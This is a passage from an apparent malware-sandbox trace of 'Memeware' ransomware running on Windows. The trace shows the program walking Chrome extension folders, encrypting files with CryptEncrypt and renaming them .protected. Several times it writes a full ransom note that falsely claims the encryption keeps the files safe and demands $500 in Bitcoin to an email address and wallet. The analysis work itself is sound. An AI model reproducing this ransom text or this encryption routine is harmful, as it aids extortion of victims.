pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0078.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.792] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.792] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.793] lstrlenA (lpString="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") returned 684 [0078.793] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.793] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.793] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.793] CloseHandle (hObject=0x164) returned 1 [0078.793] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0078.793] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned 141 [0078.793] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0078.793] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0078.793] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*") returned 143 [0078.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.794] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.794] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.794] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\.") returned 143 [0078.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.794] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.794] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.794] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.794] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.794] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.794] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.794] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\..") returned 144 [0078.794] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.794] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.794] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.795] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.795] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") 
returned 155 [0078.795] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.795] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.795] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.795] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.795] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.796] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.796] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.796] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.796] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.796] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.796] CloseHandle (hObject=0x168) returned 1 [0078.796] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.protected") returned 165 [0078.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.protected")) returned 1 [0078.798] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.798] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.798] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0078.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.798] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.798] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.799] lstrlenA (lpString="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") returned 684 [0078.799] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.799] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.799] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.799] CloseHandle (hObject=0x164) returned 1 [0078.800] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0078.800] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned 141 [0078.800] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0078.800] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0078.800] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*") returned 143 [0078.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.800] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.800] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.800] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\.") returned 143 [0078.800] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.801] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.801] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.801] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.801] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.801] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.801] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.801] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\..") returned 144 [0078.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.801] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.801] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") 
returned 155 [0078.801] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.801] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.801] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.801] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.802] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0078.802] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.802] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0078.802] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.802] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.803] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.803] CloseHandle (hObject=0x168) returned 1 [0078.803] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.protected") returned 165 [0078.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.protected")) returned 1 [0078.803] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.803] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.803] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0078.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.804] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.804] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.804] lstrlenA (lpString="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") returned 684 [0078.804] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.804] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.804] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, 